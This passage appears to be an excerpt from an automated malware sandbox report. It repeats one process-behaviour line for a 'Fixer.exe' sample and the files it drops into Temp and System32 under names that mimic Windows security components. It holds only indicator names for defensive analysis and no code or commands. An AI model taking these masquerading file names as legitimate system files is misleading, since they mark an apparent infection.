                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
